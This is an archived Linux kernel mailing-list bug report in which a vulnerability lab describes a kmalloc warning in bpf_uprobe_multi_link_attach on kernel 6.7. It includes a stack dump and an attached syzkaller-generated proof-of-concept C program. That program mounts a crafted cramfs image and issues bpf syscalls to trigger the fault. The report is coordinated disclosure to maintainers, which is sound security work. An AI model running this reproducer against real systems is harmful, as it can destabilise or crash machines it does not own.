From: "Ubisectech Sirius" <bugreport@ubisectech.com>
To: "linux-trace-kernel" <linux-trace-kernel@vger.kernel.org>,
"linux-kernel" <linux-kernel@vger.kernel.org>
Cc: "ast" <ast@kernel.org>, "daniel" <daniel@iogearbox.net>,
"andrii" <andrii@kernel.org>
Subject: WARNING: kmalloc bug in bpf_uprobe_multi_link_attach
Date: Tue, 14 May 2024 15:27:23 +0800 [thread overview]
Message-ID: <da22ddaf-384f-4a38-8338-decbfdb929fc.bugreport@ubisectech.com> (raw)
[-- Attachment #1: Type: text/plain, Size: 2911 bytes --]
Hello.
We are Ubisectech Sirius Team, the vulnerability lab of China ValiantSec. Recently, our team has discovered a issue in Linux kernel 6.7. Attached to the email were a PoC file of the issue.
Stack dump:
loop3: detected capacity change from 0 to 8
MTD: Attempt to mount non-MTD device "/dev/loop3"
------------[ cut here ]------------
WARNING: CPU: 1 PID: 10075 at mm/util.c:632 kvmalloc_node+0x199/0x1b0 mm/util.c:632
Modules linked in:
CPU: 1 PID: 10075 Comm: syz-executor.3 Not tainted 6.7.0 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:kvmalloc_node+0x199/0x1b0 mm/util.c:632
Code: 02 1d 00 eb aa e8 a7 49 c6 ff 41 81 e5 00 20 00 00 31 ff 44 89 ee e8 36 45 c6 ff 45 85 ed 0f 85 1b ff ff ff e8 88 49 c6 ff 90 <0f> 0b 90 e9 dd fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40
RSP: 0018:ffffc90002007b60 EFLAGS: 00010212
RAX: 00000000000023e4 RBX: 0000000000000400 RCX: ffffc90003aaa000
RDX: 0000000000040000 RSI: ffffffff81c3acc8 RDI: 0000000000000005
RBP: 00000037ffffcec8 R08: 0000000000000005 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000
R13: 0000000000000000 R14: 00000000ffffffff R15: ffff88805ff6e1b8
FS: 00007fc62205f640(0000) GS:ffff88807ec00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000001b2e026000 CR3: 000000005f338000 CR4: 0000000000750ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
kvmalloc include/linux/slab.h:738 [inline]
kvmalloc_array include/linux/slab.h:756 [inline]
kvcalloc include/linux/slab.h:761 [inline]
bpf_uprobe_multi_link_attach+0x3fe/0xf60 kernel/trace/bpf_trace.c:3239
link_create kernel/bpf/syscall.c:5012 [inline]
__sys_bpf+0x2e85/0x4e00 kernel/bpf/syscall.c:5453
__do_sys_bpf kernel/bpf/syscall.c:5487 [inline]
__se_sys_bpf kernel/bpf/syscall.c:5485 [inline]
__x64_sys_bpf+0x78/0xc0 kernel/bpf/syscall.c:5485
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x43/0x120 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7fc62128fd6d
Code: c3 e8 97 2b 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007fc62205f028 EFLAGS: 00000246 ORIG_RAX: 0000000000000141
RAX: ffffffffffffffda RBX: 00007fc6213cbf80 RCX: 00007fc62128fd6d
RDX: 0000000000000040 RSI: 00000000200001c0 RDI: 000000000000001c
RBP: 00007fc6212f14cd R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000000b R14: 00007fc6213cbf80 R15: 00007fc62203f000
</TASK>
Thank you for taking the time to read this email and we look forward to working with you further.
[-- Attachment #2: poc.c --]
[-- Type: application/octet-stream, Size: 18890 bytes --]
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/loop.h>
#ifndef __NR_bpf
#define __NR_bpf 321
#endif
#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif
static unsigned long long procid;
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:
//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@alumni.caltech.edu
//% BEGIN CODE DERIVED FROM puff.{c,h}
#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288
struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}
//% END CODE DERIVED FROM puff.{c,h}
#define ZLIB_HEADER_WIDTH 2
static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}
static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;
error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}
static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}
static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}
error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}
uint64_t r[1] = {0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
intptr_t res = 0;
memcpy((void*)0x20000140, "cramfs\000", 7);
memcpy((void*)0x20000180, "./file0\000", 8);
memcpy(
(void*)0x20000400,
"\x78\x9c\xec\xd0\xbf\x6b\x1a\x61\x1c\xc7\xf1\xf7\xa3\x56\xed\x4f\x2d\xb5"
"\xd0\x16\x5a\x0b\x1d\x7a\x28\xe2\x79\x62\xb7\x0e\x5a\x2a\x3d\xa8\x3d\x68"
"\xb7\x4e\x82\x5e\x69\xc1\x1f\x25\x42\xc8\x18\x03\xd9\x32\xe4\x0f\x70\x88"
"\x09\x64\x12\x87\x90\x31\x43\x62\x26\x13\x85\x60\xfe\x8d\x1c\x64\x0b\x64"
"\x31\x3c\x77\x47\xe2\x9c\xf9\x79\x2d\x77\xf7\xfd\x7c\xf9\x1c\xcf\xf3\xf5"
"\xf3\x54\x23\x0e\x41\x3c\x5f\xda\xcd\xff\x4b\x76\xa7\x63\xd7\xdf\xff\xb4"
"\x2a\xe5\x5f\x7b\xfb\x07\xcf\x48\x42\x04\x88\xfa\xf9\xf5\xdc\x23\xf7\x0f"
"\x8b\xf0\x57\x3e\x43\xe0\x74\xa1\x0e\x1c\x3f\xf4\xcb\x6a\xed\x86\xfc\x76"
"\x8a\xa0\x01\xa5\xc7\xf0\xe7\x5f\xc3\xd6\xf1\x76\x1f\xc9\x59\x82\x5b\x72"
"\xa6\x7d\x80\xd1\x4b\x6f\xcf\x80\x80\xd3\x25\xca\xc2\x2c\xef\xef\xbd\x09"
"\xcd\x29\xc5\xee\xfa\xe6\x7d\xf8\x28\xfb\x9e\x7b\xb3\x9c\xf0\x4b\x7b\xe9"
"\xe1\xe0\xe4\xc7\x24\x60\x66\x52\xbb\x6f\x83\xac\x9b\xe9\xe4\x0b\x01\x2b"
"\xfe\x7c\x6c\x66\x52\xef\xec\x0d\xa3\xfc\x5a\x2e\xb7\xfa\xb0\x4d\xc9\xcd"
"\xcf\xb3\xe3\xcc\x59\x76\x38\x98\x4d\x27\x95\xef\x56\xc5\x9a\xe6\x0d\xe3"
"\x53\x5e\xcf\xe9\x7a\x61\x66\x9d\x4e\xcc\xc2\xea\x26\xa1\x6f\x4f\x96\xe1"
"\xb7\xd7\x17\xf6\xff\x98\x0a\x73\xe1\xbe\xac\x09\xe8\x09\x18\xb8\xb9\x73"
"\x24\x9e\x02\xa3\xad\x2b\xab\x89\x90\xc7\xbe\x6c\xc5\x41\xb8\x89\xbc\x5b"
"\x37\x89\x45\x16\x93\x5a\xf5\xd5\x83\x9d\x6a\x22\x1e\x20\xa8\x21\x50\x14"
"\x45\x51\x14\x45\x51\x14\x45\x51\x94\x7b\xba\x09\x00\x00\xff\xff\x86\xf5"
"\x68\x06",
344);
syz_mount_image(/*fs=*/0x20000140, /*dir=*/0x20000180, /*flags=*/0,
/*opts=*/0x20000340, /*chdir=*/1, /*size=*/0x158,
/*img=*/0x20000400);
memcpy((void*)0x20000040, "./file0\000", 8);
syscall(__NR_chdir, /*dir=*/0x20000040ul);
*(uint32_t*)0x20000680 = 2;
*(uint32_t*)0x20000684 = 3;
*(uint64_t*)0x20000688 = 0x20000080;
*(uint8_t*)0x20000080 = 0x18;
STORE_BY_BITMASK(uint8_t, , 0x20000081, 0, 0, 4);
STORE_BY_BITMASK(uint8_t, , 0x20000081, 0, 4, 4);
*(uint16_t*)0x20000082 = 0;
*(uint32_t*)0x20000084 = 0;
*(uint8_t*)0x20000088 = 0;
*(uint8_t*)0x20000089 = 0;
*(uint16_t*)0x2000008a = 0;
*(uint32_t*)0x2000008c = 0;
*(uint8_t*)0x20000090 = 0x95;
*(uint8_t*)0x20000091 = 0;
*(uint16_t*)0x20000092 = 0;
*(uint32_t*)0x20000094 = 0;
*(uint64_t*)0x20000690 = 0x20000000;
memcpy((void*)0x20000000, "syzkaller\000", 10);
*(uint32_t*)0x20000698 = 0;
*(uint32_t*)0x2000069c = 0;
*(uint64_t*)0x200006a0 = 0;
*(uint32_t*)0x200006a8 = 0;
*(uint32_t*)0x200006ac = 0;
memset((void*)0x200006b0, 0, 16);
*(uint32_t*)0x200006c0 = 0;
*(uint32_t*)0x200006c4 = 0x30;
*(uint32_t*)0x200006c8 = 0;
*(uint32_t*)0x200006cc = 0;
*(uint64_t*)0x200006d0 = 0;
*(uint32_t*)0x200006d8 = 0;
*(uint32_t*)0x200006dc = 0;
*(uint64_t*)0x200006e0 = 0;
*(uint32_t*)0x200006e8 = 0;
*(uint32_t*)0x200006ec = 0;
*(uint32_t*)0x200006f0 = 0;
*(uint32_t*)0x200006f4 = 0;
*(uint64_t*)0x200006f8 = 0;
*(uint64_t*)0x20000700 = 0;
*(uint32_t*)0x20000708 = 0;
*(uint32_t*)0x2000070c = 0;
res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000680ul, /*size=*/0x90ul);
if (res != -1)
r[0] = res;
*(uint32_t*)0x200001c0 = r[0];
*(uint32_t*)0x200001c4 = 0;
*(uint32_t*)0x200001c8 = 0x30;
*(uint32_t*)0x200001cc = 0;
*(uint64_t*)0x200001d0 = 0x20000040;
memcpy((void*)0x20000040, "./file0\000", 8);
*(uint64_t*)0x200001d8 = 0x200000c0;
*(uint64_t*)0x200000c0 = 0;
*(uint64_t*)0x200001e0 = 0;
*(uint64_t*)0x200001e8 = 0;
*(uint32_t*)0x200001f0 = 0xffffff1f;
*(uint32_t*)0x200001f4 = 1;
*(uint32_t*)0x200001f8 = 0;
syscall(__NR_bpf, /*cmd=*/0x1cul, /*arg=*/0x200001c0ul, /*size=*/0x40ul);
return 0;
}
next reply other threads:[~2024-05-14 7:27 UTC|newest]
Thread overview: 8+ messages / expand[flat|nested] mbox.gz Atom feed top
2024-05-14 7:27 Ubisectech Sirius [this message]
2024-05-15 21:30 ` WARNING: kmalloc bug in bpf_uprobe_multi_link_attach Alexei Starovoitov
2024-05-15 21:47 ` Jiri Olsa
[not found] <CABOYnLz2e+_0P88RgoDy6epWz9xrM2zhfMQdVrcjNiPqrFcBeQ@mail.gmail.com>
2023-12-11 11:22 ` Masami Hiramatsu
-- strict thread matches above, loose matches on Subject: below --
2023-12-11 8:12 xingwei lee
2023-12-11 11:29 ` Hou Tao
2023-12-11 13:01 ` Jiri Olsa
2023-12-11 14:34 ` Jiri Olsa
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=da22ddaf-384f-4a38-8338-decbfdb929fc.bugreport@ubisectech.com \
--to=bugreport@ubisectech.com \
--cc=andrii@kernel.org \
--cc=ast@kernel.org \
--cc=daniel@iogearbox.net \
--cc=linux-kernel@vger.kernel.org \
--cc=linux-trace-kernel@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox